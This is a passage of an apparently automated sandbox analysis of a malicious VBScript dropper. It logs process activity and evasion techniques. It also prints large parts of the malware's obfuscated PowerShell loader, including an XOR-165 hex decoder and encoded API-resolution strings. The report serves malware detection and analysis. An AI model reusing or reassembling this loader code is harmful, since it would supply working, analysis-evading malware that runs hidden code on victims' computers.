'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gby0wth2.meo.ps1 Jump to behavior
Source: classification engine Classification label: mal68.evad.winVBS@6/2@0/0
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("powershell.exe", " "$Vildmnd = """SaFLauConFacGatUniStoUn", "", "", "0");
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial file Initial file: do while timer-temp<sec
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3608 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFDC3F811AB sldt word ptr [eax-023BE512h] 10_2_00007FFDC3F811AB
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 